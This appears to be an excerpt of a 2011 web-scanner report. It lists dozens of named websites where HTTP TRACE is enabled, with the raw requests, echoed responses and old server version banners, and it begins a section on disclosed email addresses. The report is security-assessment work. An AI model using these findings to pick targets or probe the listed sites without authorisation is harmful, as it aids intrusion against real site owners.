Cookie: de1cbdd3ec2a16dd


24.1112. http://www.webcash-assistance.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webcash-assistance.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.webcash-assistance.com
Cookie: 5931e3a4e4b0a780

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:49:23 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 5931e3a4e4b0a780
Host: www.webcash-assistance.com


24.1113. http://www.webdesign.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webdesign.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.webdesign.org
Cookie: 75542f38520822c6

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:36:40 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.17-0.dotdeb.0 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.webdesign.org
Cookie: 75542f38520822c6


24.1114. http://www.webecoist.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webecoist.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.webecoist.com
Cookie: b9b3347cd32e6a9a

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:50:52 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.webecoist.com
Cookie: b9b3347cd32e6a9a


24.1115. http://www.webfreestuff.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webfreestuff.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.webfreestuff.com
Cookie: d23b6e60f7d1f411

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Content-Type: message/http
Date: Wed, 04 May 2011 00:43:04 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.webfreestuff.com
X-Cluster-Client-Ip: 173.193.214.243
Cookie: d23b6e60f7d1f411
Connection: Keep-Alive


24.1116. http://www.webratsmusic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webratsmusic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.webratsmusic.com
Cookie: a8a2fe96ed729eab

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:42:08 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6 PHP/5.2.9 with Suhosin-Patch mod_gzip/1.3.26.1a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: a8a2fe96ed729eab
Host: www.webratsmusic.com


24.1117. http://www.webtvhub.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webtvhub.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.webtvhub.com
Cookie: 221864f0a3314558

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:15:51 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.webtvhub.com
Cookie: 221864f0a3314558


24.1118. http://www.webwarper.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webwarper.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.webwarper.net
Cookie: f82d83d04d2ebe39

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:42:22 GMT
Server: Apache/1.3.33 (Unix) mod_perl/1.29 PHP/4.3.11
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: f82d83d04d2ebe39
Host: www.webwarper.net


24.1119. http://www.weightloss-wand.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weightloss-wand.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.weightloss-wand.com
Cookie: 630d10409c2179ab

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:35:22 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.weightloss-wand.com
Cookie: 630d10409c2179ab


24.1120. http://www.wendy4.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wendy4.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wendy4.com
Cookie: 320577ab7bce08b0

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:56 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.17 mod_gzip/1.3.26.1a mod_ssl/2.8.31 OpenSSL/0.9.7e-p1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 320577ab7bce08b0
Host: www.wendy4.com


24.1121. http://www.weplaysports.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weplaysports.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.weplaysports.com
Cookie: fce976c30ea6cfbb

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:20 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.weplaysports.com
Cookie: fce976c30ea6cfbb


24.1122. http://www.westhost.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.westhost.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.westhost.com
Cookie: 21bd2cc3bbe33848

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:07:35 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.westhost.com
Cookie: 21bd2cc3bbe33848


24.1123. http://www.wetmaturevids.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wetmaturevids.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wetmaturevids.com
Cookie: 493b526e548e2eb8

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:29:59 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 493b526e548e2eb8
Host: www.wetmaturevids.com


24.1124. http://www.wetpantyhosepics.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wetpantyhosepics.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wetpantyhosepics.com
Cookie: ffa198d94922aac9

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:20:52 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: ffa198d94922aac9
Host: www.wetpantyhosepics.com


24.1125. http://www.wetviphole.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wetviphole.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wetviphole.com
Cookie: 4c9c47f558d5d8bf

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:18:44 GMT
Server: Apache/1.3.41 (Unix) mod_perl/1.30 PHP/5.2.10 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 4c9c47f558d5d8bf
Host: www.wetviphole.com


24.1126. http://www.whenmybaby.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whenmybaby.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.whenmybaby.com
Cookie: da938d5529b76375

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:22:21 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.whenmybaby.com
Cookie: da938d5529b76375


24.1127. http://www.whfoods.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whfoods.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.whfoods.org
Cookie: 27fcfa65ceef37f6

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:59:38 GMT
Server: Apache/2.2.16 (Amazon)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.whfoods.org
Cookie: 27fcfa65ceef37f6


24.1128. http://www.wholesalesports.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wholesalesports.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wholesalesports.com
Cookie: 3171478fdf11f879

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Content-Length: 133
X-Cacheable: NO: !obj.cacheable
Date: Wed, 04 May 2011 02:24:03 GMT
X-Varnish: 905441922
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

TRACE / HTTP/1.0
Host: www.wholesalesports.com
Cookie: 3171478fdf11f879
X-Varnish: 905441922
X-Forwarded-For: 173.193.214.243


24.1129. http://www.wildwoodsnj.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wildwoodsnj.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wildwoodsnj.com
Cookie: 2672c83203aae216

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:25:19 GMT
Server: Apache/2.2.15 (Unix) JRun/4.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wildwoodsnj.com
Cookie: 2672c83203aae216


24.1130. http://www.win7heads.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.win7heads.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.win7heads.com
Cookie: 7b3cf3569f07a196

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:02:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.win7heads.com
Cookie: 7b3cf3569f07a196


24.1131. http://www.windowsforum.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.windowsforum.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.windowsforum.org
Cookie: f372271c8e38bd74

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:16:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.windowsforum.org
Cookie: f372271c8e38bd74


24.1132. http://www.windowsreference.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.windowsreference.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.windowsreference.com
Cookie: 11286657eb76de6d

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:04:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.windowsreference.com
Cookie: 11286657eb76de6d


24.1133. http://www.womensenews.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.womensenews.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.womensenews.org
Cookie: a60910009896a26f

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:40:29 GMT
Server: Apache/2.2.14 (EL)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.womensenews.org
Cookie: a60910009896a26f


24.1134. http://www.wopular.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wopular.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wopular.com
Cookie: 4ab3bcbbb3bc530d

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:05:54 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wopular.com
Cookie: 4ab3bcbbb3bc530d


24.1135. http://www.wor710.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wor710.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wor710.com
Cookie: eacd9fbdd9d5767d

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:24:08 GMT
Server: Apache/1.3.29 (Unix) mod_gzip/1.3.26.1a PHP/4.2.3
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerRadio_Pool=3574614083.20480.0000; path=/

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: eacd9fbdd9d5767d
Host: www.wor710.com
X-Forwarded-For: 173.193.214.243


24.1136. http://www.word2word.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.word2word.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.word2word.com
Cookie: cec642ed7780e1fb

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:06:00 GMT
Server: Apache/2.0.63 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.word2word.com
Cookie: cec642ed7780e1fb


24.1137. http://www.wordsearchbible.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wordsearchbible.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wordsearchbible.com
Cookie: f5a8cb30c064a28f

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 02:03:07 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 77

TRACE / HTTP/1.0
Host: www.wordsearchbible.com
Cookie: f5a8cb30c064a28f


24.1138. http://www.workingmother.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.workingmother.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.workingmother.com
Cookie: c6c8536a5f248461

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Content-Length: 131
Date: Wed, 04 May 2011 02:10:25 GMT
X-Varnish: 775738687
Via: 1.1 varnish
Connection: close
age: 0
X-Cache: webcache11: MISS

TRACE / HTTP/1.0
Host: www.workingmother.com
Cookie: c6c8536a5f248461
X-Forwarded-For: 173.193.214.243
X-Varnish: 775738687


24.1139. http://www.worldbookonline.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldbookonline.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.worldbookonline.com
Cookie: ef9f6012a50067a9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 04 May 2011 03:15:41 GMT
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: www.worldbookonline.com
Cookie: ef9f6012a50067a9


24.1140. http://www.worldschoolphotographs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldschoolphotographs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.worldschoolphotographs.com
Cookie: 802fa28d08fc2bc9

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:24:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.worldschoolphotographs.com
Cookie: 802fa28d08fc2bc9


24.1141. http://www.worthdownloading.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worthdownloading.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.worthdownloading.com
Cookie: 2b3df63d425ebed3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:03:53 GMT
Server: Apache/2.2.15 (Unix) DAV/2 PHP/5.1.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.worthdownloading.com
Cookie: 2b3df63d425ebed3


24.1142. http://www.wow-tube.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wow-tube.ru
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wow-tube.ru
Cookie: b854c52467e55f74

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 08:18:55 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wow-tube.ru
Cookie: b854c52467e55f74


24.1143. http://www.wyndhamworldwide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wyndhamworldwide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wyndhamworldwide.com
Cookie: db9400cefa58ed93

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:35:48 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wyndhamworldwide.com
Cookie: db9400cefa58ed93


24.1144. http://www.xguitar.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xguitar.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.xguitar.com
Cookie: f57fdb3e7c15411a

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:26:38 GMT
Server: Apache/2.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.xguitar.com
Cookie: f57fdb3e7c15411a


24.1145. http://www.xvidmovies.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xvidmovies.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.xvidmovies.com
Cookie: 96baed99a8e5a32d

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 06:14:56 GMT
Server: Apache/1.3.29 (Unix) PHP/4.3.10
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 96baed99a8e5a32d
Host: www.xvidmovies.com


24.1146. http://www.y-bbs.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.y-bbs.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.y-bbs.net
Cookie: 74bf94f3ae942a49

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:37 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.y-bbs.net
Cookie: 74bf94f3ae942a49


24.1147. http://www.yachtingmagazine.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yachtingmagazine.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yachtingmagazine.com
Cookie: a506337045774626

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:17:02 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yachtingmagazine.com
Cookie: a506337045774626


24.1148. http://www.yeah1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yeah1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yeah1.com
Cookie: 3b429d81d3c176c8

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:35:29 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yeah1.com
Cookie: 3b429d81d3c176c8


24.1149. http://www.ymlp186.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ymlp186.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ymlp186.com
Cookie: c9b84ff577db86ef

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:31:13 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ymlp186.com
Cookie: c9b84ff577db86ef


24.1150. http://www.ymlp70.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ymlp70.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ymlp70.com
Cookie: d15e0c1518980201

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:48:00 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ymlp70.com
Cookie: d15e0c1518980201


24.1151. http://www.youbecomerich.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youbecomerich.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.youbecomerich.com
Cookie: e45dbb9347612a10

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 22:54:05 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.youbecomerich.com
Cookie: e45dbb9347612a10


24.1152. http://www.youngamanda3d.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youngamanda3d.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.youngamanda3d.com
Cookie: 706b1f2c67d5d480

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:16:21 GMT
Server: Apache/2.2.17 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.youngamanda3d.com
Cookie: 706b1f2c67d5d480


24.1153. http://www.yourdailyjournal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yourdailyjournal.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yourdailyjournal.com
Cookie: 679e12357ef46d60

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:52:41 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yourdailyjournal.com
Cookie: 679e12357ef46d60


24.1154. http://www.yourfundingguide.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yourfundingguide.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yourfundingguide.org
Cookie: 8253aa5fd58d29a8

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:38:31 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yourfundingguide.org
Cookie: 8253aa5fd58d29a8


24.1155. http://www.yourhotgiftzone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yourhotgiftzone.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yourhotgiftzone.com
Cookie: ebd2de1b119052fc

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:05:35 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yourhotgiftzone.com
Cookie: ebd2de1b119052fc


24.1156. http://www.youthoughtso.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youthoughtso.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.youthoughtso.com
Cookie: 3c1111878aa1eb5a

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:37:52 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.youthoughtso.com
Cookie: 3c1111878aa1eb5a


24.1157. http://www.youtorrent.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtorrent.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.youtorrent.com
Cookie: 75662de3e37612a6

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:50:37 GMT
Server: Apache/2.2.17 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.youtorrent.com
Cookie: 75662de3e37612a6


24.1158. http://www.yugiohcardmaker.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yugiohcardmaker.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yugiohcardmaker.net
Cookie: 843dbcfa16933e40

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:12:22 GMT
Server: Apache/2.2.15 (EL)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yugiohcardmaker.net
Cookie: 843dbcfa16933e40


24.1159. http://www.yumyum.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yumyum.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.yumyum.com
Cookie: c4b1febb560a1930

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:03 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yumyum.com
Cookie: c4b1febb560a1930


24.1160. http://www.zimbra.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zimbra.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.zimbra.com
Cookie: 164ae4a5782bcce0

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:54:01 GMT
Server: Apache/2.2.3 (Oracle)
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerwww-zimbra-prod-web-pool=2705223946.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.zimbra.com
Cookie: 164ae4a5782bcce0
X-Forwarded-For: 173.193.214.243


24.1161. http://www.zoneteens.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zoneteens.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.zoneteens.com
Cookie: 6a070abbc026289

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 19:34:45 GMT
Server: Apache/1.3.41 (Unix) mod_perl/1.30 PHP/5.2.10 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 6a070abbc026289
Host: www.zoneteens.com


24.1162. http://www.zoofiliasite.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zoofiliasite.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.zoofiliasite.com
Cookie: 52be74bba34b1d17

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:16:33 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.zoofiliasite.com
Cookie: 52be74bba34b1d17


24.1163. http://www.zunga.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zunga.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.zunga.com
Cookie: b59e1f856701ed88

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:57:15 GMT
Server: Apache/1.3.41 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: b59e1f856701ed88
Host: www.zunga.com


25. Email addresses disclosed  previous  next
There are 91 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


25.1. http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.i.com.com
Path:   /cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js HTTP/1.1
Host: i.i.com.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.0 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 03 May 2011 21:44:55 GMT
ETag: "2dde7"
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Thu, 05 May 2011 01:28:50 GMT
Date: Wed, 04 May 2011 01:28:50 GMT
Connection: close
Content-Length: 187879

var CBSi={};(function(){var B,A=false;if(document.location.search.match("jsdebug")){B=document.location.search.match(/jsdebug=([^\&]+)/)[1]||"true";}else{B=document.cookie.match(/jsdebug=([^;]*)/);B=(
...[SNIP]...
